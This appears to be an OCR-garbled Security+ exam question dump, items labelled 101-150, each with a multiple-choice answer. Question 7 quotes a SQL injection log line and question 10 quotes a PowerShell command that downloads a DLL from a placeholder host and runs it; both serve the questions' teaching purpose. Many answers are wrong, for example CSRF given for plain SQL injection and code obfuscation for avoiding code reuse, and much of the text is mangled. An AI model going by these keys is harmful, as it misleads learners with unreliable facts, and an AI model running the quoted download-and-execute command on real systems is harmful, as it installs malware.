101-150

Question 1

During an internal penetration test, a security analyst identified a network device that had accepted cleartext authentication and was configured with a default credential. Which of the following recommendations should the security analvst make to secure this device?

A Configure SNMPv1.
B Configure SNMPv2c
C Configure SNMPV3.
D Configure the default community string.

Answer 1

C. Configure SNMPV3.

Question 2

After a recent security breach, a security analyst reports that several administrative usernames and passwords are being sent via cleartext across the network to access network devices over port
23. Which of the following should be implemented so all credentials sent over the network are encrypted when remotely accessing and configuring network devices?

A SSH
B SNMPV3
C SFTP
D Telnet
E ETP

Answer 2

A. SSH

Question 3

Developers are writing code and merging it into shared repositories several times a day, where it is tested automatically. Which of the following concepts does this best represent?

A Functional testing
B Stored procedures
C Elasticity
D Continuous integration

Answer 3

D. Continuous integration

Question 4

Which of the following risk management strategies would an organization use to maintain a legacy system with known risks for operational purposes?

A Acceptance
B Transference
C Avoidance
D Mitigation

Answer 4

D. Mitigation

Question 5

While reviewing an alert that shows a malicious request on one web application, a cybersecurity analyst is alerted to a subsequent token reuse moments later on a different service using the same single sign-on method. Which of the following would BEST detect a malicious actor?

A Utilizing SIM correlation engines
B Deploying Netflow at the network border
C Disabling session tokens for all sites
D Deploying a WAF for the web server

Answer 5

A. Utilizing SIM correlation engines

Question 6

A company is implementing BOD and wants to ensure all users have access to the same cloud-based services. Which of the following would BEST allow the
company to meet this requirement?

A laaS
B PaaS
C MaaS
D SaaS

Answer 6

D. SaaS

Question 7

A security analyst reviews web server logs and notices the following line:

104.35.45.53 - - [22/May/2020:07:00:58 +0100] “GET /wordpress/w-content/plugins/custom plugin/check user.php?
userid-1 UNION ALL SELECT user login, user pass, user email from w users-_
HITF/1.1” 200 1072
“http://www.example.com/wordpress/wo-admin/t

Which of the following vulnerabilities is the attacker trying to exploit?

A SSRF
B CSRF
C XSS
D SOLi

Answer 7

B. CSRF

Question 8

An engineer needs to deploy a security measure to identify and prevent data tampering within the enterprise. Which of the following will accomplish this goal?

A Antivirus
B IPS
C ETP
D FIM

Answer 8

D. FIM

Question 9

Which of the following is a physical security control that ensures only the authorized user is present when gaining access to a secured area?

A A biometric scanner
B A smart card reader
C A PKItoken
D APIN pad

Answer 9

A. A biometric scanner

Question 10

An employee received an email with an unusual file attachment named Updates Ink. A security analyst is reverse engineering what the file does and finds that it executes the following script:

C:Windows|System32\WindowsPowerShellv1.0lpowershell.exe-URI https: //somehost.com/04EB 18 jpg -OutFile Senv:TEMPlautoupdate.dil;Start-Processrundi132.exe Senv.:TEMPlautoupdate dil

Which of the following BEST describes what the analvst found?

A A PowerShell code is performing a DLL injection.
B A PowerShell code is displaying a picture.
C A PowerShell code is configuring environmental variables.
D A PowerShell code is changing Windows Update settings.

Answer 10

A. A PowerShell code is performing a DLL injection.

Question 11

A user enters a username and a password at the login screen for a web portal. A few seconds later the following message appears on the screen.

Please use a combination of numbers, special characters, and letters in the password field

Which of the following concepts does this message describe?

A Password complexity
B Password reuse
C Password history
D Password age

Answer 11

A. Password complexity

Question 12

A Chief Information Security Officer (CIS) needs to create a policy set that meets international standards for data privacy and sharing. Which of the following should the CISO read and understand before writing the policies?

A PCIDSS
B GDPR
C NIST
D ISO 31000

Answer 12

B. GDPR

Question 13

Due to unexpected circumstances, an IT company must vacate its main office, forcing all operations to alternate, off-site locations. Which of the following will the company MOST likely reference for guidance during this change?

A The business continuity plan
B The retention policy
C The disaster recover plan
D The incident response plan

Answer 13

A. The business continuity plan

Question 14

Which of the following tools can assist with detecting an employee who has accidentally emailed a file containing a customer’s PI?

A SCAP
B NetFlow
C Antivirus
D DLP

Answer 14

D. DLP

Question 15

Which of the following algorithms has the SMALLEST key size?

A DES
B Twofish
C RSA
D AES

Answer 15

A. DES

Question 16

A security administrator is seeking a solution to prevent unauthorized access to the internal network. Which of the following security solutions should the administrator choose?

A MAC filtering
B Anti-malware
C Translation gateway
D VPN

Answer 16

D. VPN

Question 17

A major political party experienced a server breach. The hacker then publicly posted stolen internal communications concerning campaign strategies to give the opposition party an advantage.
Which of the following BEST describes these threat actors?

A Semi-authorized hackers
B State actors
C Script kiddies
D Advanced persistent threats

Answer 17

D. Advanced persistent threats

Question 18

A user recently entered a username and password into a recruiting application website that had been forged to look like the legitimate site. Upon investigation, a security analyst identifies the following
• The legitimate website’s IP address is 10.1.1.20 and Recruit local resolves to this IP.
• The forged website’s IP address appears to be 10.2.12.99, based on NetFlow records
• All three of the organization’s DNS servers show the website correctly resolves to the legitimate P
• DNS query logs show one of the three DNS servers returned a result of 10.2.12.99 (cached) at the approximate time of the suspected compromise
Which of the following MOST likely occurred?

A A reverse proxy was used to redirect network traffic.
B An SSL strip MITM attack was performed.
C An attacker temporarily poisoned a name server.
D An ARP poisoning attack was successfully executed

Answer 18

C. An attacker temporarily poisoned a name server.

Question 19

Several attempts have been made to pick the door lock of a secure facility. As a result, the security engineer has been assigned to implement a stronger preventative access control. Which of the following would BEST complete the engineer’s assignment?

A Replacing the traditional key with an RFID key
B Installing and monitoring a camera facing the door
C Setting motion-sensing lights to illuminate the door on activity
D Surrounding the property with fencing and gates

Answer 19

A. Replacing the traditional key with an RFID key

Question 20

A systems engineer wants to leverage a cloud-based architecture with low latency between network-connected devices that also reduces the bandwidth that is required by performing analytics directly on the endpoints. Which of the following would BEST meet the requirements? (Choose two.)

A Private cloud
B Saas
C Hybrid cloud
D laas
E DRaaS
F Fog computing

Answer 20

D. laas
F. Fog computing

Question 21

Two organizations are discussing a possible merger. Both organizations Chief Financial Officers would like to safely share payroll data with each other to determine if the pay scales for different roles are similar at both organizations. Which of the following techniques would be best to protect employee data while allowing the companies to successfully share this information?

A Pseudo-anonymization
B Tokenization
C Data masking
D Encryption

Answer 21

C. Data masking

Question 22

Which of the following typically uses a combination of human and artificial intelligence to analvze event data and take action without intervention?

A TIP
B OSINT
C SOAR
D SIEM

Answer 22

C. SOAR

Question 23

Which of the following describes the exploitation of an interactive process to gain access to restricted areas?

A Persistence
B Buffer overflow
C Privilege escalation
D Pharming

Answer 23

C. Privilege escalation

Question 24

Multiple beaconing activities to a malicious domain have been observed. The malicious domain is hosting malware from various endpoints on the network. Which of the following technologies would be BEST to correlate the activities between the different endpoints?

A Firewall
B SIEM
C IPS
D Protocol analyzer

Answer 24

B. SIEM

Question 25

An organization with a low tolerance for user inconvenience wants to protect laptop hard drives against loss or data theft. Which of the following would be the MOST acceptable?

A SED
B HSM
C DLP
D TPM

Answer 25

A. SED

Question 26

A security analyst has been reading about a newly discovered cyberattack from a known threat actor. Which of the following would BEST support the analyst’s review of the tactics, techniques, and protocols the threat actor was observed using in previous campaigns?

A Security research publications
B The MITRE ATT&CK framework
C The Diamond Model of Intrusion Analysis
D The Cyber Kill Chain

Answer 26

B. The MITRE ATT&CK framework

Question 27

A manufacturing company has several one-off legacy information systems that cannot be migrated to a newer OS due to software compatibility issues. The OSs are still supported by the vendor, but the industrial software is no longer supported. The Chief Information Security Officer has created a resiliency plan for these systems that will allow OS patches to be installed in a non-production environment, while also creating backups of the svstems for recovery. Which of the following resiliency techniques will provide these capabilities?

A Redundancy
B RAID 1+5
C Virtual machines
D Full backups

Answer 27

C. Virtual machines

Question 28

A security administrator is analyzing the corporate wireless network. The network only has two access points running on channels 1 and 11. While using airodump-ng, the administrator notices other access points are running with the same corporate ESSID on all available channels and with the same BSSID of one of the legitimate access points. Which of the following attacks is happening on the corporate network?

A On-path
B Eviltwin
C Jamming
D Rogue access point
E Disassociation

Answer 28

D. Rogue access point

Question 29

An administrator receives the following network requirements for a data integration with a third-party vendor:

Port 443 allowed OUTGOING to www.vendorsite.com
Port 21 allowed OUTGOING to fsl.vendorsite.com
Port 22 allowed OUTGOING to fs2.vendorsite.com
Port 8080 allowed OUTGOING to www2.vendorsite.com

Which of the following is the most appropriate response for the administrator to send?

A FTP is an insecure protocol and should not be used.
B Port 8080 is a non-standard port and should be blocked.
C SSH protocol version 1 is obsolete and should not be used.
D Certificate stapling on port 443 is a security risk that should be mitigated

Answer 29

A. FTP is an insecure protocol and should not be used.

Question 30

A company is auditing the manner in which its European customers’ personal information is handled. Which of the following should the company consult?

A GDPR
B ISO
C NIST
D PCIDSS

Answer 30

A GDPR

Question 31

A company’s public-facing website, https://www.organization.com, has an IP address of 166.18.75.6. However, over the past hour the SOC has received reports of the site’s homepage displaying incorrect information. A quick slookup search shows https://www.organization com is pointing to 151 191.122.115. Which of the following is occurring?

A DoS attack
B ARP poisoning
C DNS spoofing
D NXDOMAIN attack

Answer 31

C. DNS spoofing

Question 32

Which of the following can reduce vulnerabilities by avoiding code reuse?

A Memory management
B Stored procedures
C Normalization
D Code obfuscation

Answer 32

D Code obfuscation

Question 33

A security analyst is tasked with classifying data to be stored on company servers. Which of the following should be classified as proprietary?

A Customers’ dates of birth
B Customers’ email addresses
C Marketing strategies
D Employee salaries

Answer 33

C. Marketing strategies

Question 34

As part of the building process for a web application, the compliance team requires that all PKI certificates are rotated annually and can only contain wildcards at the secondary subdomain level.
Which of the following certificate properties will meet these requirements?

A HTTPS://* comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022
B HTTPS://app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022
C HTTPS://* app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022
D HTTPS://* comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2023

Answer 34

C. HTTPS://* app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

Question 35

A security analvst needs to centrally manage credentials and permissions to the company’s network devices. The following security requirements must be met.

• All actions performed by the network staff must be logged.
• Per-command permissions must be possible
• The authentication server and the devices must communicate through TCP

Which of the following authentication protocols should the analyst choose?

A Kerberos
B CHAP
C TACACS+
D RADIUS

Answer 35

C. TACACS+

Question 36

A software company adopted the following processes before releasing software to production.

• Peer review
• Static code scanning
• Signing

A considerable number of vulnerabilities are still being detected when code is executed on production. Which of the following security tools can improve vulnerability detection on this environment?

A File integrity monitoring for the source code
B Dynamic code analysis tool
C Encrypted code repository
D Endpoint detection and response solution

Answer 36

B. Dynamic code analysis tool

Question 37

A security policy states that common words should not be used as passwords. A security auditor was able to perform a dictionary attack against corporate credentials. Which of the following controls was being violated?

A Password complexity
B Password history
C Password reuse
D Password length

Answer 37

C. Password reuse

Question 38

Which of the following holds staff accountable while escorting unauthorized personnel?

A Locks
B Badges
C Cameras
D Visitor logs

Answer 38

D. Visitor logs

Question 39

Which of the following strategies shifts risks that are not covered in an organization’s risk strategy?

A Risk transference
B Risk avoidance
C Risk mitigation
D Risk acceptance

Answer 39

A. Risk transference

Question 40

Certain users are reporting their accounts are being used to send unauthorized emails and conduct suspicious activities. After further investigation, a security analyst notices the following:

• All users share workstations throughout the dav.
• Endpoint protection was disabled on several workstations throughout the network.
• Travel times on logins from the affected users are impossible
• Sensitive data is being uploaded to external sites.
• All user account passwords were forced to be reset and the issue continued.

Which of the following attacks is being used to compromise the user accounts?

A Brute-force
B Keylogger
C Dictionary
D Rainbow

Answer 40

A. Brute-force

Question 41

A security forensics analyst is examining a virtual server. The analyst wants to preserve the present state of the virtual server, including memory contents. Which of the following backup types

A Snapshot
B Differential
C Cloud
D Full
E Incremental

Answer 41

A. Snapshot

Question 42

Which of the following roles, according to the shared responsibility model, is responsible for securing the company’s database in an laaS model for a cloud environment?

A Client
B Third-party vendor
C Cloud provider
D OBA

Answer 42

A. Client

Question 43

A company is implementing MFA for all applications that store sensitive data. The IT manager wants MA to be non-disruptive and user friendly. Which of the following technologies should the IT manager use when implementing MA?

A One-time passwords
B Email tokens
C Push notifications
D Hardware authentication

Answer 43

C. Push notifications

Question 44

A security operations technician is searching the log named /var/messages for any events that were associated with a workstation with the IP address 10.1.1.1. Which of the following would provide this information?

A cat /var/messages | grep 10.1.1.1
B grep 10.1.1.1 | cat /var/messages
C grep /var/messages | cat 10.1.1.1
D cat 10.1.1.1 | grep /var/messages

Answer 44

A. cat /var/messages | grep 10.1.1.1

Question 45

Which of the following control types fixes a previously identified issue and mitigates a risk?

A Detective
B Corrective
C Preventative
D Finalized

Answer 45

B. Corrective

Question 46

A financial analyst is expecting an email containing sensitive information from a client. When the email arrives the analyst receives an error and is unable to open the encrypted message. Which of the following is the most likely cause of the issue?

A The S/MIME plug-in is not enabled
B The SSL certificate has expired
C Secure IMAP was not implemented
D POP3S is not supported

Answer 46

A. The S/MIME plug-in is not enabled

Question 47

Which of the following is a reason to publish files’ hashes?

A To validate the integrity of the files
B To verify if the software was digitally signed
C To use the hash as a software activation key
D To use the hash as a decryption passphrase

Answer 47

A. To validate the integrity of the files

Question 48

Which of the following is the BEST action to foster a consistent and auditable incident response process?

A Incent new hires to constantly update the document with external knowledge.
B Publish the document in a central repository that is easily accessible to the organization.
C Restrict eligibility to comment on the process to subject matter experts of each IT silo
D Rotate CIRT members to foster a shared responsibility model in the organization.

Answer 48

B. Publish the document in a central repository that is easily accessible to the organization.

Question 49

A company’s help desk received several AV alerts indicating Mimikatz attempted to run on the remote systems. Several users also reported that the new company flash drives they picked up in the break room only have 512KB of storage. Which of the following is most likely the cause?

A The GPO prevents the use of flash drives, which triggers a false positive AV indication and restricts the drives to only 512KB of storage
B The new flash drives need a driver that is being blocked by the AV software because the flash drives are not on the application’s allow list, temporarily restricting the drives to 512KB
of storage.
C The new flash drives are incorrectly partitioned, and the systems are automatically trying to use an unapproved application to repartition the drives
D The GO blocking the flash drives is being bypassed by a malicious flash drive that is attempting to harvest plaintext credentials from memorv.

Answer 49

D. The GO blocking the flash drives is being bypassed by a malicious flash drive that is attempting to harvest plaintext credentials from memorv.

Question 50

A company uses specially configured workstations for any work that requires administrator privileges to its Tier 0 and Tier 1 systems. The company follows a strict process to harden systems immediately upon delivery. Even with these strict security measures in place, an incident occurred from one of the workstations. The root cause appears to be that the SoC was tampered with or replaced. Which of the following MOST likely occurred?

A Fileless malware
B A downgrade attack
C A supply-chain attack
D A logic bomb
E Misconfigured BIOS

Answer 50

C. A supply-chain attack